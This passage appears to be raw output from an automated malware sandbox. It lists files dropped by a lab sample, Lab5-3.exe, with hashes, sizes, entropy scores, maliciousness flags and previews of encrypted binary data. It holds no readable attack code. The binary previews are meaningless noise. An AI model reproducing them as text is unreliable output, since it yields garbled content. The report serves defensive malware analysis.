                                                                                                          MD5:2595DF8F0640071A5BD266E04A8A2661
                                                                                                          SHA1:DA9AA270C0BA23B88A056662DB459B09CD6E8C75
                                                                                                          SHA-256:51303DFF039383FC872FDF22BF81B5D6FFDBB9993ABE60ACFE0E107EECFAC5F3
                                                                                                          SHA-512:E791C69F6FD45FD1AD2291158C3D37D3AA80732066B38A12E4B8F6E05128DFF2BE518D682AB3A18D15004E2B1624BF8BDA17BB0C093632C9D11595BA11B2D0C0
                                                                                                          Malicious:false
                                                                                                          Preview:.K.g....|.7T0..s.. >yA..yN.&.....%.A@b....A...{...aW".i..{'......<......X5/..^3U<..!.....<-aa..(.u.v,. nl.KH.<...[..^.~....<\....Y?.8.@.G.J2....d..]..?.xd..rs.7..r'2.q.8.9..@.../.$O<S...^..r....hj..|.F0..i"...S..'e].;X.s....O.l/..zKTb......l.U.....ZZ.....(Z1..'..:.^....7..P.....'.i.u~.G...f......"Tr." U.JlwX..,. KI2/.8.:.LlT.._.<.]/.Mr...~q........:.....N..b.....A:.?b....1".9...q...8/~Ba...7B...]h.O.fF.........5C......v............~..~.v..0.f6.......!.....1......Y..,.5.C...."....p....(\.....)..zJ.M-.M.Y..-a.D<{juB.)..?.[]N ..j.y..b...i[MG)..'t;B...3..........}].$$.m.y6l..m%!D8X.~: D...R"7.f........lT-....~t......)...6..w)..By...^..X.V.-.....U...y.6..p..l]c+.../.....!=....$..).1.H.M....ZP.s.M..5g2..hLS....#......4.".....I..r...M.6.>.6....Mq.,..X.d1....j....@.p`.5.#an:..9....P..h.G..a.....ou..{G..[F.7..$......f.8.^._..*.t... .O...YHF....;...60q:_.J...d$.e....17....Z9..ty.,z}..L.....F]u....Ci..I....C{.NrT}.:o..{..x........g"G>q.....e..W.Hr.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.928742844757563
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ne/WwGZND2u/4dUw4AjfIm/gwp/eHfUTid3hBaUoSGFcmeykEdEElU92i:g/WnZ8CtzAD/gwp/xGx0uKeY2ElUJ
                                                                                                          MD5:082C273B2D46DB3BB524420ED7EC1816
                                                                                                          SHA1:1914F252AAC05284D69F2502E734AFB73CBA2956
                                                                                                          SHA-256:31429228A0D950F6A7A9A7AE5D0A313B0650FEEE1BC36D679AE597B07B21CBBB
                                                                                                          SHA-512:D96BA43F51BA0404EBB3E98E7F719D9647D5263C945ED9B0EEE85C535FC6ECA194335B9EE2F5D1448DE23D929DE91AEC14056DDA5573399C154AEBA096C3BB49
                                                                                                          Malicious:false
                                                                                                          Preview:3(.i-.@...K..ra.....5...U@#3.i...k.M...&]..P........oRU]....3...YeOu.^....yY.........yw8#.....zs..#..g..p...{m.c.t./...v.+$.Z..\-....P..3.o.. .#...Q'..b.j.l...0....W....*o..).....o.{....g_..........IE ..v...3z..#....*......"y.4.dp..J/..-..#..L.4x..(.......y.......6_..i{.X........a.2.<s}..l.8\Y...j.\4k.tU. 8.|...]~...6...,..M;.....5vX3A.....(..U].....j.5.).;...V'J.sht.R|>X.L..00D~..D.3..Z....y...[..m.{........8.?.....W.Jw*.F.l+.^......i.;.........v...|..wB..........j.p/.5...Y.Hd........vZ.*'....sz.,.mg7..#....I....V.O.b<../M..v..(...(O..."...V....r.r...X.V.j..de|.L..?..bG...^.wE.?..`.!.......|...)[.r.x7...s......nR......^*P3H....P.....6..b..V.u..C.=6..../r.h...,.".......J.c.$)....>".X...ek*i..C..a....}G.......FN..1.....&.\BZ.%..%j..^....R.7.....+s..pm.W.._...'....H....)X......?0!.N....L..........C.<..U..3....9. %........Ywv..J..8...56..Z......a...L...v...._..X.hXv..$....5.....x.....N..u..R.....p...N...|w{N&..\..g...Gd.."v...\....... ..G...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.935180331655429
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ESW4Fkmeqf8JOsWAwe3LIy2wxQ6xpWEzlFtaG5W0jHfUTid3hBaUoSGFcmeykEdM:o+teCWwMLDxQ6xsGFHwGx0uKeY2ElUJ
                                                                                                          MD5:65235E99619AD0FA0C5D28A9EADEDDD7
                                                                                                          SHA1:B6663D416B9E7479EC1B392ECB4D8229698F5171
                                                                                                          SHA-256:6ADC0D5EE6E88D98D2878FB8BE0D5A24E2B41E5685C322B27AF4AB20F16D1034
                                                                                                          SHA-512:EB09C2136CFC245024B53188C87C6A4FD0294B2EE3C7C4AAF8DC34CCA6FCBF104F8C9CE01C55F6826FC4673D4CDD308ADD7987591B53A53D4876B03B88A2E554
                                                                                                          Malicious:false
                                                                                                          Preview:d....=.....@t...Wm..+.....%....@x...\"i.Tg.....sF..M.!V....k...C.I...e.D./{P...^..gh...r\i.G..u@E{.e.....;......`IV.d|'../.A.....>.u.=...J...`v.i.Ma.x*..8.z.T.a.Af..i...>uH.GFI..q.)...M~.....Em....T5v.:...._..G.t...e<..Q...m.e.....}}..OS.....l.&Uw..$J..v\]V...Y.B....{..@.%z.9.<.Z?........1o.....Ji.n..Tb!..3...;.].9!.....?R.x>f...tu......S</s...x.!.c.P..........LAU.H*..+rU.`....J...........C.kN.Z@.?...~......%........+.O{K.,e...Mb..$.VJx.!.$... j._.SU.L_..I:M?.y.-.]U.....@.1...&@.7..=..S?D..\,.H...DU..[..:.t..]..4....H.....\.1/.Y.....4...d..~.d.X&...*....12.lyT.L..q..y....4.l.uWBM^KZ.2...j.3..|..^...H...hQ.DU|}CY.&v1I...C.P..j.L.......z1..F.[Qd)\..e..."...1.k...bM.0.W..6Nxq..&... 6"!..w9.&.J(....M.........{.;?..z....$..=..xI..h.fJE......a9..O......(.4O[].8(T.u.\l....jZ..;.8.f/.3..Dq..@.tj-9.......JiI.R^:..\.ZA..Yt..s.i... -.5\a.H*......F:...H1@.-p........9..rH3_..2S.A#...|i..k..6...gf.*./.U...=!..~..Kb......]wC...l....jRb.}....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.941132168891866
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:v+4jbn7mKyN33vRyE02iqFGx0uKeY2ElUJ:rjPmKyN3/hV60Cb
                                                                                                          MD5:27E91CA5B20E94D1DA36C456EFC0FCF4
                                                                                                          SHA1:6FC1B66813D8446DC5C42E37EA4797AC68D68CE0
                                                                                                          SHA-256:520F3E6C767A85BE4A6719C1A58ADFE46145747CAAA2E2BEA1AF95F461DC54F5
                                                                                                          SHA-512:4CA863653C201513394678AA7C9C899967D6DDF16D5E23C0332BD2C2C56B3FA3BC1D5B0CDDED7EC2723980873816AA6C1C84C11C4BAF4B04E64BDFBD295AD7E7
                                                                                                          Malicious:false
                                                                                                          Preview:..s#z...n..b5..[.{...}..J.X.0tw.5..K....MZ".E......5B...f.N..%.|.h..%.8..&...'.Q.e.M......oG<...{1.s.@pF..S......%xEU..'..{v............F._.CZQ.m...l.....\.s5;.z.t..Y.s.f~U,..8..~.,..OYR.q.5....M.g..:_Y.7.h...$.o..WpH.T.x.n.#&r.!...4G.n....j..H*a.b....<....[......w.G..Q............HR./......c.@df^i$.nfs.>.....Z...'.u.W.3.....'............{c..$3.<D&..V.......x...|.C..O.|F|/.`...1..e..py........1.!#..8Y..v.'.v.|^0BHZ..6.G....b.[.l......}.{.~.o...........[...6^.MD4?..'\....c......$...r....`;..-..j@.h4. |m..|jHJ.....-..W...C....d}.....Ti.ZK!./]........h.k..k0R>.B.2.....n....U....].........2h.6.z~.=..C}..&..<e. ..W.d....P....H...t....G.....D1.qc6c..K.......L8|....<.X.5X...AK,L.o.....j3..S;.Gbg?....N....*T.O....s.....m:..O..>.".V.u...U....B./.{.m}.:..&.r..{..(".|.u.-(..;B......G>;..BB...r...n.....m.....VC....Z.O..v$.Qyn.c....o.......LQi..b.d k.._.f.{Q v..ED........IS`.Zr..R.].......)>.T%..R..7.xP.*A..T#K....i".....@....B.K.._I...;t.n(.0....w....g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3120
                                                                                                          Entropy (8bit):7.937856943455549
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:MPNMB5kHgrdapFpFL94jthFGx0uKeY2ElUJ:Wm5D5y/L4jXe0Cb
                                                                                                          MD5:BE0414BAF23B0DE438926FDE89DC25F5
                                                                                                          SHA1:D47D64E478F9ABF1CE19E3E7700AE752CD358CCE
                                                                                                          SHA-256:3ADDA094E3B6C3C5BA8FFABCF551946A70929003AA99449EE01078F5DDD6BD5C
                                                                                                          SHA-512:CEA1B279C251AD8C0C03B92FF3AF5DD048157450E446481B1C6E6AF9703B2348F1D84CCFF2B44504F9488AE824154364FA6C151A0FF8CD1E6BC480015B162839
                                                                                                          Malicious:false
                                                                                                          Preview:."..#..2}W.....).TP....O.C.....-thE(.q.....L....M...j@S..k.....$..........X..[...T-..l....W.,."..$-.|n.d..oH..]?.\.?{2.m...j..F.......54..@....O.|..uv;..6.+q...A.!.&.....oi.."Y.S......l.......\.K...05.^R.......d5..8.s...g..p.o.7.n...@.S..3.Z`....,Y...P.|...U......m.._=....\.:..Kq....^.7.I.....SY......\{H..B..s4.....+...(\.W..).a.......ljz.2.,O.....9#U.`....."..j.*....6..$..."..I.Eoi... ...Q...............R..m.q......Y....>..N.......7].F......E. ./.W.`..zCrM.B(..h...F.y...Z.lO.5..\.A.y....e,.L..wFte..QR=.V/.?.l.. `{.../.$.~..|g.w6L..:i..gB........_.P.eIy..D+.:."....U....a.^.C.:..^.h<..:.......,..".:IfA^az}...81.L.c.....Ob?H...n&.3..G........E;..2...tk...58.(..p.r...}....=..J[....)....0...:........"9w.r....Wp.I:....)1).........\.?......#(LXV...,..-'.[.<........N8....=..p..p...k.OK....\.#..k.....29..Q...3.J....wCO...Qwc\p7..Fa.2...}...o...M.^..z.B.R.-...lwd...8....0.'v....=O.L`|.P......L....Mc5R.....L..A.c....)..k..K..7Fw.......;. .+x..68.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2496
                                                                                                          Entropy (8bit):7.928081305226418
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:c151o8Ej8xOkhvhx7GNSbsz4FogybeJkxxEkiwhNMHfUTid3hBaUoSGFcmeykEdM:c11I8xOUz7mSbSFS0xtbhlGx0uKeY2E+
                                                                                                          MD5:9E8D9AF80765EDF37BB1021F24EA8E22
                                                                                                          SHA1:307D843811825263F802C37CBD51D1B176CA3FB5
                                                                                                          SHA-256:FB89A04C985301C35F83765CD8B675597D1AF98C827EFBB22EFAE961D561D920
                                                                                                          SHA-512:D6BC20B53F59A3E6BB399701793C8742E50BAEDEA4ECA8539E18AF52D729001EA010A04F806427CDDB926087AD0437FE44355541BF55AD658826EDA5559364F0
                                                                                                          Malicious:false
                                                                                                          Preview:.t.9^....w.!....zx~.f.'__gZD..l,... 9%..i)-W....b..N..LB`....8.a.......D:e'..%.`U.y.FONb.m:..s.../.'.s..s#............FT.5..Y&.E.8..Q.....4.b(.........]^.jO. ...l.On..%ZF........YJ!...eN._...h.,.8g.P..|k)Xi......3-..U^.E...|.....i.....u.....u.. ~u.......-s............Z..ikL.{.z.......}0EA.MH..>..+.w....5........1..l..r.f.*...e.b?.4...4..P7.X-...Q......T.......0?.;...s....L...........H....?}..L......!0..........2{U....e...AJe...I.2........!..F.n.|..{.x%..8....PT.....V.t[.880...D..f....v...=....O....m..{...=\{..n"..J....x/..J..gpP.J....o....241...q....*e..\...*[.%.5...v...._.~X.k..o.B...D.YZv....x.M.O+...q.v.!C`E|..*_.E..%..c......(...Qp!t..28.k..k.T.w...)\.@.....%......W.,.........OB.u.....N..s.Z...S.y.....mv..D..h+.&L)}S.R@.....`....,'.R.1j4...\.R........W...]..i..-...|-.."H3.rg......Y.o,".?:ub..8..()k&..c...1.... %...U..\gO.(+..o.yEh...t..3Il%.......i{....g....G.....H.,..1.Gy.......Vv..<H.V.w...p.....Si..~\.....e.c..I.j...i.<.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.911607249004996
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KTnwr/yhic2HfUTid3hBaUoSGFcmeykEdEElU92i:KTukicJGx0uKeY2ElUJ
                                                                                                          MD5:5ADFD83301218CE4A8871994304B1930
                                                                                                          SHA1:2ED8C24098C8DB90E0AFD21D3B257CF62A073777
                                                                                                          SHA-256:1F016E3761D103D63F07483BCC8E5A8603A2EF5D0922AA2AED4595AD585D471E
                                                                                                          SHA-512:1BB73AE15643D324A0D56842261163C81D865D92DA9928E9E5D4335596137D6A09EABF1989ACF3F2F2F6356850DF75F08997171694EF73A3491775C281D91900
                                                                                                          Malicious:false
                                                                                                          Preview:...|..4.L..D==..q{3.uPN.}K...'....>.....|..I.. T..E..Ql.NF....3.e9.T..........i.K.].!.U......fgi..S..LN...A..eQ);...oBe?V.3.......D.cU@+r..."N_.p.A.M7.4....=..$1.Y... .~1........H|...s^...tJ..f...@.T..-..m.<a...l..`.5..._.=,..=..G.^...27......N].]2...E.zy..eR.0D.?..R.)..Bp.$........!..-U..]..L...r....l.B.g_...2.U.$.>...?...q.k.I>.~..~...$.t..s....BdxBwF.R.j..O..6r1K^X.y.......b..W....B..+..C.e.|.......K.j..}...S...|............Rv.Bi.Cp. .]..m....EN...UUud.@...t..'.\...4./i.G..J.3}..k.....ww.rU."& k.....aRuKb'..:.@...........S......eG....q..iR.M.*.7.....y.Tw.xe5"..iH..>..L.....ol._=~..4.Z../O....(....|...[.......;d5N./.5.e.M@S...o(Q...r>...r.j.HB......8.w..-><.....}&Y| .`...[%x.Y.O..H2.........m~..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.935580452126908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rYTkZlSyvnjpzPREBc+ab+sTx2+060g/CVKjtHfUTid3hBaUoSGFcmeykEdEElUJ:+klVuPaCy2+t7GGx0uKeY2ElUJ
                                                                                                          MD5:0F33BF05EFC3CFC47DF6D3B88F553508
                                                                                                          SHA1:E361CF345658283750D7F372785B492C02740271
                                                                                                          SHA-256:3F0C83481B5257AB87F69DA3796E1359E9498788D0E4542DF2434E56FDC9842D
                                                                                                          SHA-512:2BA514646A99DA8A4605B4F3CF707CE00E028E98A4688DDE47F8D30333150ED531F9BD4A34459F765B521CF79AD9EE204F19B5575D63B1CB1B84EE0E26B925C1
                                                                                                          Malicious:false
                                                                                                          Preview:.'I.......".....u.)..4. .j+..T...e.r...aD@..{...>.._a;...5..~XYw...........H.........d..Z.Vf..mX....9.G.&d..W.8.w.../...z.K.p..,.F.).-.......8].........tbT..)S~.#..+X(.T.#..k..._..#........U.S.Dr3b..>.(.;S.S....?L...~J.<0.......,la..u>6P.F(.V'.A.,..[.k.h....o..W......q.f.g.w...a_.F..6.O2..k.a..'.;..t..).z......M..CC..N.|~...B.1.e.wS7 ........../.>.}LR.DJ.........w+7Q:..g:r.....E.....^.............RAf..m.V...l.>##U...k.gO.....#...H{.!".&..se....L..;V..r.(.8.E4;.!5..|V'..<.y.(.?..x.4.`/I.r..g...gO.n....&..E&K-.*6.....&L.\.2.>.GA.!..j...Q.K....;Z."c&q`.kQ.d......U..s3...@...\A...&gi=..8f.n^AkD.uGk.5.a..#....#...X.{.6..<.6..x.....&%<....^.o.8..%.X..Tr.[..=...)...R.4..!...d........t.G...W..W..X.#.;...*.."......Y..mv......fv{..d-..+....2..........m..(..B.o.{......h.....kB..%.T.&1z....-...'.-..P.unY.t.....P.T.........t.;.mEF..$eW.......I-......y]v.I....K.....C..=.<`RB....oj.l............../y%..R..I....E.c.^....yPo....0].=..e.9.R...C..4Z..@..4..-..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.934379900145168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3/PmkxaPjsPrIlbdEJDu4W0MVMm07aqseHBxoigHfUTid3hBaUoSGFcmeykEdEE+:vPmkajsP0dEJDu41e0RoinGx0uKeY2E+
                                                                                                          MD5:E9A82072CD17F81D61D16E19206DB3F9
                                                                                                          SHA1:56409C95CBA94883804DD6030939BF0925772AF2
                                                                                                          SHA-256:B44B8CC6F63AC9D1BB83EDE3C26FE10E5B1C81022BE188CCCE70BABBC0C9F5FD
                                                                                                          SHA-512:630FDDCFC17380470F7A895F3D80E62071E79359DE6E5B3ABA72263E11513A99A52295372CD6258BC65BF521E7CB374E86BB79AFF74ED4996C474DABD63C4515
                                                                                                          Malicious:false
                                                                                                          Preview:d.'.+:.....M..E......U._.G...d.r..... .2..T....[..(....*4...0.$D.8.D...k..1....^.On.R.......X..0...b.#Os..K...,0...!v..{..u@...I........6...E.I.W..0.}A.j.....o...6.P.w~.=.}.....:..U.%q.>.gJ^..6JO...6.i..~.gY.7K..~,...6,...]....x..9...bBs.......'x.}."7..IqR..U.tM........%.sv..>A4.>.]..>t7Y...eO...#.h4...n/.c.,|.....v9....C.}7.....}..".).k.9..D2....).2z.UN#....aE..8...................*..v...5.Q...../.. J...9;...7.[.>.1K..5..mB...j.1..I.3...-k..,T..J.<.~.<.$..\:.&..<......K.h.....4:..K.|..........0......L....+Dv...!,X...Hq.X......V....| ....p.o.s..1...m.....S .m.Hy"..,...H../M...u.Z..)...R.3..D......VrFI.}..Kp..m!.,b3...U.....-...\...2...%9K..YMK......"".....4B\.......}..|.T.aZ.M)...a.({:.i.|B....K....<P<H%.....j.....=0...?U..&......\.eO...jN=...]X?....2....{....9`........d..,...d:...'a%d.z..>........H..............eV.S$*......C"....N.......[....q......9ia>..W.YJL0a.l.9K~./..K ..{.....2....<.....9q:.rI&....qa..~.j....p..d?9`...~.<\s.%..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10512
                                                                                                          Entropy (8bit):7.980298916458071
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:evVfK2YLi3fiLfIC2MiagZ0o19/ciFwfTjZLurh6oOS0Cb:AVfK2EqfiLfkMi/ZDVci2Zurh6oOStb
                                                                                                          MD5:60314716E51D9A79C8B70B178B1A1E3A
                                                                                                          SHA1:D993FABC1047ABEC006E0D7F91A027581ADE9D55
                                                                                                          SHA-256:FFC1C723BED403C03A5E6CE0AF4FD90F35F5ED0BBB2B3D906D637A699EF30700
                                                                                                          SHA-512:E4DE35E6B842E6FB664CFB7EC758C723C3B9B52F9609A15B93870520105B45E6E66789C0B8E4402C645C295FCADCF52EA37417F3080687E34AD295D26EC45982
                                                                                                          Malicious:false
                                                                                                          Preview:?.....Q....'..{G....f...j..>i.2..~/.^...U.....CctF.b../..)._?e.h.z....*.X..z..W...|m..EY...'.. ...1.}.}..l.E'5U..I..a...&.f.=.!^. .....A..i..`..T....2".....Y.....U...^....n..\.<.n.6v.L.ig.{..3.u..>....w.....]..p....Ai. .B..7............7.Z......^i.br.....a^.<....j/K^..>3...c P..h...?`.cT...KN..B... ...S.}.."&....e.*.......,N.r..7......NQ?..Jp........."...o.......+. ...k....... 2Q..V.i.-3...}...A.n........l......f.....n$.jt.c...Pr$%T........G..C.U"j>a...V.....5....I.w....{....|..............B(.M.R.x......[7.J...O.Pu.E.N...:"4.,..E.*%...m..gR......hr)...&.#S4..5....#m....&D-d.......HLf..r..........~...}..Y)r1.....5......d..@.]!2...d..G:&P.......c..lb.L.l(f.H.........vb^..._?P~.3.n&^}[....[.{...q8uv.C.oL.>....V....z..S./(C..wka./..<..WYa....X.b].C|@...[.].d..w.I..\7(..k.,.X.Z6......[.......}+..xj..=..Gg.Cz|..r..8r.i.C...K,.. .+X.?..!e&|m..f9..$.'..[.l.8......$.....kXO..{......F!:w.m}.[>0.......A0..A................K~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20336
                                                                                                          Entropy (8bit):7.990455314368158
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:l5m6KebvGmlfbTcmP1O12f8FNVZyE2rIra4WaMLTtb:l5Me7Guvpm2eVZCIrQLTZ
                                                                                                          MD5:BF10D3A1C53E401E7B961B9DB7EFE3E2
                                                                                                          SHA1:F23527F8A35F2E4A502BAC55913C13623FDE2595
                                                                                                          SHA-256:AEDC3C856A0C5F891AFDF8A4E50ED2E57FCEDC3795E6492181BB83C952975354
                                                                                                          SHA-512:F5E511C46124EF671FBD52BB7409B0443BB7C1A1AC861494E8A8C987F5DA42455FA4F49049CBE5AB7942338C12A4F207DAF8ECDC4AD4FF83404516323CF8F18C
                                                                                                          Malicious:true
                                                                                                          Preview:n..-.....o.WP.G..G\...Rn..Q<...N.m.r....B.@..:...E....h'.l.+d%.....o1'..ZD.......o..N.aL|..1..L}....v.:3G.@.v.....-.93...3...N/#;...!....&z.tP.....(o..|..M....D.|YtY...7..9.bL..Hq.G.r....F86x...1..QB8=.7V."........{..hE`n.<].......o.`..e&..q...E.e..l..K-/.~........OO..<.........) '7D...Z.=KrT.....v.~...D1.9n....k....e...Rw.$...K..5H(..#D7q3D..j._)t......~.i.4.o.l`F.D0i...u.q.....i}../n.._.h..pnB.B..K.<..#..|./.J..G..8R.../5.L.>h..z,<..."..5...]H>.>.......>.{3......h.wCB.....:J.J;....I.9U.T..dj...V...uj....+..S...TS.....'@..x.B.T^...?..EvpH....1..]..[c..h\.&.C.....S..R..}...+.....6..].....a...c..vB.I..;.c ...&...2..x'.8.w.'...Y......],..W..C....ha.i....o...,.]q...F.Y..z..8AB3.Z....o._.........G..D.,.9AI......0.,MYEB..+......9....W+.vD.0.t....C.V;.....Z..V.........-...I#.F.a}.b.~.....V......<.+....z\.....S..bV7..;0..4.CKX..=87.}....u.d....We...M..$......>g8....KM...G?.Y[.v......%.......|l.B!...Lo4..r..F9...n...;.#....`]7..B4.T..S....P.g.Sp/
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10736
                                                                                                          Entropy (8bit):7.98117619959912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:QamSPtOOxCL67Z2zBqQYMCwfsnIHQG4wozMeuIHFitBapo/sPA70cGXVdlUlO3Z3:Qa3IO0L6cNbhJsnuQG4TMeuE8yoHitUm
                                                                                                          MD5:5E2C45E8DEE32534143949A5D714409E
                                                                                                          SHA1:6C93C4FA9F2B14CA363B9914CCBE0CF1DB82FAEF
                                                                                                          SHA-256:C318F3514BCF2B9956AF8DCFD08C067B12627ECB8E18B8E6AC24123942414A8C
                                                                                                          SHA-512:E16846EDADADDC1C42B3B56B55BF160D1CE7C4093692A458167538A53F3B8729A15F76A7650D97A1D618C1FB83BEC556286CB4DA0365101CB2E01A946B44E92F
                                                                                                          Malicious:false
                                                                                                          Preview:.....A..{...9...b.R...&Y ... M....d.......@....Ox."..H..ko.>.#...2%~.E...\...~.^.i.2..2E..W..dz..)0..Maj!...sq.....\*:....l..zQ....?p.\......S[.]..t..+N..g..-l.........%IN..U..Q.!...B.a...<...CVA.....t;-i_.M`#-...2...z..P...:utHk.R.JX....Sp.......z......w.D.'is[...{ ...x.../.q.R.oI..1...&....t...o...aJ;.o...1...iws....ayoZ2.R....Z...E..2u..?m..E6.....TX.>........F....B..@.:..........^.....t..`...~.vFm.......].T.h..X...............^5......zD..c...?.6 J...*..c..$..P.7...b..K.1.*..f.....-.W.'......T.+.....[..O..:...A..Ic..Z.y...FX.....v.V...p.oO.:..T..<.I.&.E.rK/]v0G.Qr...f<..Xp....N......O$n.X.v........f.[p....K..\....i..WX....b...^.p....hh=...3T........c..o<...EL8.eA[7.)q'.A'...tW.B.e..%....Xv...Z....+o...q..e...a..:...;{M.........p....W1....Z^z.;....[.P3....QKTE....a)..w..@U.H7f...5RV`h.Gk^m.6...1v.^.z[.{UX..n5..M..g..-+B.}..?H...^.9l".fx.n.6....>m._.N.2L.u.X.Z..H.O...s.A=..I...........eW....L.c_..LT}........<.X..f..t........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20800
                                                                                                          Entropy (8bit):7.991674794293106
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:cy2m3BtE+Vg60Bl3/PlzhbhYcuM7Ox18DUfieExMq5m34qGzhOXDGbOGFYlctb:cyp8+/0jppTYi5MRoCzeDFRZ
                                                                                                          MD5:7C94252308A6EC35A249C5175CD7EE02
                                                                                                          SHA1:0FAB508C6BCAD506199087FF435C999DFA5C80FB
                                                                                                          SHA-256:EFC7B242167A4119265084C06BDE943892F4DF6B0893283FC2DFFEF75CEF9525
                                                                                                          SHA-512:BCAC127950E571FA942C8ADE2C988EC4BE64D43E4BF343AB2FC6D882C820720573F0C1FB5EBBCD2D8FD629F5A2576DE3A5E296AA564831122B2170E542769DEF
                                                                                                          Malicious:true
                                                                                                          Preview:G...z.R.8../..).z.....!...L....aZ...:j7....}....`....D"....g..W'.,*.!.>W.\....../=..^....h.?t...A.a....<F,{.q.#...k....k.-d=...z....+pQ%%..zS. ....Hs8t.[[.....dp.H...uJ.|V....dD.5.Mc .=-.ZbPd.Y^0.sD*.?].S.$.9........GM{................F........`..QdG.-...|L.6.4v.H.n.k..Z+W..+..._..#....Px*Y.%!...?..x.F./...l..Oh.VA.K. T.'.8Y..Ks../.5x_l.S..m.)..0.$..SL#CI...X.<...M!d5_...r.&......D..j....M...95.|........."L..j...S...e.3.p/r.%......#...z....'.....Quaz.Xt..h.<...J..d.6...i...KF.<+...6.....{....SZI&.."r..A..A....;.&../D..i......$U..1c0...w.\.D8..S..m.K.. .-.P..d..o.zwm.....9N..J4v..fV{..c#......5.Cp......KY/.D..d.]...~....^n..';..=.%.O.x..h...c(....5..Z.(\....B..Q.....-....A.*...........d..H..8.~a.7.YT.|.....~k# .yI...k.Pb^Hr.uM.N...'R.....T.%b..Ok.,......r.1..PL..I.V..4...m..0.......4.$....mP.],.l..ZF....V.(.m.......k..n?.r..%$i.g.F.........9....C.3......Y(.5Ir.}.1.@@e0r.S...{7h^h!.qy.....j-........a...j.....O.e..+......i. ...~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2048
                                                                                                          Entropy (8bit):7.909579754237694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9gxLpHLwQa2eHcHfUTid3hBaUoSGFcmeykEdEElU92i:KxZwQa2eHbGx0uKeY2ElUJ
                                                                                                          MD5:60CA9541A3284EBCE3AE40A1B19211E3
                                                                                                          SHA1:5F626AD2CAC825EC8B9600B86C7107AB338F18D4
                                                                                                          SHA-256:9B857E787E1A39B47F6C6D260E965693426E47ABF4D877AA14118256E1EDBE48
                                                                                                          SHA-512:26B479CF9B012526FB9914870F277558B07A4681461D6461D223A0D6E3FAF7EDC057209931984ADDDDF6E0B37CFF0A6C9307411A22125DADA8BDF6094C6733B1
                                                                                                          Malicious:false
                                                                                                          Preview:Ve..5r......X..>4-j._.vX.z...;.bA.[.6...C...{8..P...8....`t...G}.T..c..cR.!...r..|.z..\R.....!..cd.(;@......'D..jI../k...I.."....V...5.J....&D%Ny...Y...Y..t.8JaU.Bi....k8....f.z.......3....g?....{..W7.*jo.ZM..Z9z............&..U.S.5...7..C....i..2..<[.K v..7..b.L.8.v|..B..>.h.gFu.hy.}e..`.Yn.P.Fw. ..Qz.......mp..q..@.9q......7Z..I]....../.3B....t.Y...88..^g.y.cAK...../._..E.#...... s.<...,|..C..o....f..f9...A...9:..S.4M...Q...Q.._[....t/....\A....2.N.e`...m.:u..<....9..q...'d.}.k.....=.]b..M.D.....W..E|...gT1.-+...^...d.?).(4...w.3h.&.c...A...#...g"..|_.z.....M...}'l9C...........B.U.&...O.|.28.r..C.v.~. ...a....,0..n.'..P],.1E......_.>.....(}tX.y.T..f.m8S;..........2.y3..:t.nw..?....AYF.9|uM....Q.WEgK..A..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2320
                                                                                                          Entropy (8bit):7.915655827022768
                                                                                                          Encrypted:false
